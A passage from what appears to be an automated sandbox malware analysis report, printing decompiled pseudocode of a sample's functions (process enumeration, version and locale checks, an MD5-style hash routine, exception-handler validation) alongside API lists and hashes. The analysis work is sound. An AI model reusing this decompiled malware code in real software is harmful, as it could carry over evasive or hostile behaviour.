					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xa1d230; // 0x4a6a5a8
						_t2 = _t9 + 0xa1edf8; // 0x73617661
						_push( &_v264);
						if( *0xa1d114() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00a122a7
0x00a122b1
0x00a122b5
0x00a122bf
0x00a122f0
0x00a122c6
0x00a122cb
0x00a122d8
0x00a122e1
0x00a122f8
0x00a122e3
0x00a122eb
0x00000000
0x00a122eb
0x00a122f9
0x00a122fa
0x00000000
0x00a122fa
0x00000000
0x00a122f4
0x00a12300
0x00a12305

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A122AC
Process32First.KERNEL32(00000000,?), ref: 00A122BF
Process32Next.KERNEL32(00000000,?), ref: 00A122EB
CloseHandle.KERNEL32(00000000), ref: 00A122FA

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 09115cc01420f9a7d9cc1b1d55fe1ef4438ceac837c990e01b22690fcc0e0798
Instruction ID: b5c0372902ea57ed428610c2a40a487aa27e918aff62ec9f05dcc6a6548ae865
Opcode Fuzzy Hash: 09115cc01420f9a7d9cc1b1d55fe1ef4438ceac837c990e01b22690fcc0e0798
Instruction Fuzzy Hash: C7F090726010246BD720E7A69D09FEF77ACEBC8710F000161FA55C7001EA34DAE68BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6FC4166F, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FC4166F() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6fc44130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6fc4413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6fc4412c = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6fc44128 = _t5;
					 *0x6fc44130 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6fc44124 = _t6;
					if(_t6 == 0) {
						 *0x6fc44124 =  *0x6fc44124 | 0xffffffff;
					}
					return 0;
				}
			}

0x6fc41670
0x6fc4167e
0x6fc41686
0x6fc4168b
0x6fc416d5
0x6fc416d5
0x6fc4168d
0x6fc41695
0x6fc416d1
0x6fc416d3
0x6fc41697
0x6fc41697
0x6fc4169c
0x6fc416aa
0x6fc416af
0x6fc416b5
0x6fc416bd
0x6fc416c2
0x6fc416c4
0x6fc416c4
0x6fc416ce
0x6fc416ce

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,6FC41011), ref: 6FC4167E
GetVersion.KERNEL32(?,6FC41011), ref: 6FC4168D
GetCurrentProcessId.KERNEL32(?,6FC41011), ref: 6FC4169C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,6FC41011), ref: 6FC416B5

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: b911da6b64dafaead41976d26261528dac220392877b46e04504c0162b7f86c9
Instruction ID: a869b685d82a4acd9ae2b11c20c4f3df4948139b1bbf16b55660e208b2a1efd3
Opcode Fuzzy Hash: b911da6b64dafaead41976d26261528dac220392877b46e04504c0162b7f86c9
Instruction Fuzzy Hash: A2F09031650A029FEF00BF68AC0A7803BB5F75A732F20021AFB41E90C0E77090789F18

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41B13, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6FC41B13(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6fc41b17
0x6fc41b28
0x6fc41b30
0x6fc41b32
0x6fc41b45
0x6fc41b45
0x6fc41b4f

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6FC4163E,?,?,?,00000000,00000000,?,?,?,6FC41069), ref: 6FC41B28
GetSystemDefaultUILanguage.KERNEL32(?,?,6FC4163E,?,?,?,00000000,00000000,?,?,?,6FC41069), ref: 6FC41B32
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6FC4163E,?,?,?,00000000,00000000,?,?,?,6FC41069), ref: 6FC41B45

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: bae33e93d9eaabeceff706d8b1c3893bf8dafb7781d9e3bbe7cb9499ad97f78d
Instruction ID: 6d364596aa48ead87b4c97b806ea73f862941c5ed426c13ae553e6124c03bf66
Opcode Fuzzy Hash: bae33e93d9eaabeceff706d8b1c3893bf8dafb7781d9e3bbe7cb9499ad97f78d
Instruction Fuzzy Hash: 2CE04FB4740309B6EB00EB91CD07FB972BCEB4070AF500144FB41E60C0E6B49E18A729

Uniqueness

Uniqueness Score: -1.00%

Function 6FC6DC66, Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6FC6E02D,?,?,?,00000001), ref: 6FC6DC6B
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6FC6DC74

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a0eaf959def6f90cd1c595bfab791677f89fcd1d7dbaed9f51a4eae084fea651
Instruction ID: c8d7ae9465b9b16de6e606e42b973f0b6f10f72b9a3a5e48253ed9d886c6198d
Opcode Fuzzy Hash: a0eaf959def6f90cd1c595bfab791677f89fcd1d7dbaed9f51a4eae084fea651
Instruction Fuzzy Hash: 5DB0923104861AEBCF002BD1EC0AB987FB8FB06666F008010F70D450518B7264308BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A140B3, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00A140B3(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x00a140b6
0x00a140c1
0x00a140c4
0x00a140c7
0x00a140c8
0x00a140c8
0x00a140d3
0x00a140e4
0x00a140e6
0x00a140e9
0x00a140e9
0x00a140ec
0x00a140ec
0x00a140ef
0x00a140ef
0x00a140f2
0x00a140f2
0x00a1410f
0x00a14112
0x00a14128
0x00a1412b
0x00a14145
0x00a14148
0x00a1415e
0x00a14161
0x00a14163
0x00a1417b
0x00a1417e
0x00a14181
0x00a14199
0x00a1419c
0x00a141b6
0x00a141b9
0x00a141cf
0x00a141d2
0x00a141d4
0x00a141ec
0x00a141f1
0x00a141f4
0x00a1420a
0x00a1420d
0x00a14227
0x00a1422a
0x00a14240
0x00a14243
0x00a14245
0x00a14260
0x00a14263
0x00a1427a
0x00a1427d
0x00a14281
0x00a1429a
0x00a1429d
0x00a1429f
0x00a142a2
0x00a142bd
0x00a142c0
0x00a142d9
0x00a142dc
0x00a142ec
0x00a142ef
0x00a14307
0x00a1430a
0x00a14324
0x00a14327
0x00a1433f
0x00a14342
0x00a14358
0x00a1435b
0x00a14373
0x00a14376
0x00a1438e
0x00a14391
0x00a143ab
0x00a143ae
0x00a143c4
0x00a143c7
0x00a143df
0x00a143e2
0x00a143fc
0x00a143ff
0x00a14417
0x00a1441a
0x00a14430
0x00a14433
0x00a1444b
0x00a1444e
0x00a14466
0x00a14469
0x00a1447b
0x00a1447e
0x00a14490
0x00a14493
0x00a144a5
0x00a144a8
0x00a144ac
0x00a144bc
0x00a144bf
0x00a144cd
0x00a144d0
0x00a144e2
0x00a144e5
0x00a144f9
0x00a144fc
0x00a144fe
0x00a1450e
0x00a14511
0x00a14523
0x00a14526
0x00a14534
0x00a14537
0x00a14549
0x00a1454c
0x00a14550
0x00a14560
0x00a14563
0x00a14575
0x00a14578
0x00a14586
0x00a14589
0x00a1459b
0x00a1459e
0x00a145b0
0x00a145b3
0x00a145c7
0x00a145ca
0x00a145de
0x00a145e1
0x00a145f5
0x00a145f8
0x00a1460c
0x00a1460f
0x00a14623
0x00a14626
0x00a1463a
0x00a1463f
0x00a14651
0x00a14654
0x00a14668
0x00a1466b
0x00a1467f
0x00a14682
0x00a14698
0x00a1469b
0x00a146af
0x00a146b2
0x00a146c4
0x00a146c7
0x00a146db
0x00a146de
0x00a146f2
0x00a146f5
0x00a14709
0x00a14712
0x00a14715
0x00a1471e
0x00a14727
0x00a1472f
0x00a14737
0x00a14741
0x00a14756

APIs

memset.NTDLL ref: 00A1474A

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 9a35ab16c410ebec120d6e973322aca9da4e54b7e5eae7d9a565d0bb68c1b7f3
Instruction ID: 1b0fb6d33b8b5ca55f9901febeacd415dab3236ed407530cf70d3201dbc11820
Opcode Fuzzy Hash: 9a35ab16c410ebec120d6e973322aca9da4e54b7e5eae7d9a565d0bb68c1b7f3
Instruction Fuzzy Hash: B122737BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 6FC423C5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FC423C5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6fc44178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6fc441c0 = 1;
										__eflags =  *0x6fc441c0;
										if( *0x6fc441c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6fc44178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6fc441c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6fc44178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6fc44180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6fc4417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6fc44180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6fc44180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6fc441c0 = 1;
							__eflags =  *0x6fc441c0;
							if( *0x6fc441c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6fc44180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6fc44180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6fc441c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6fc44180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6fc44178 = _t81;
								}
								_t58 = _t81 - 1;
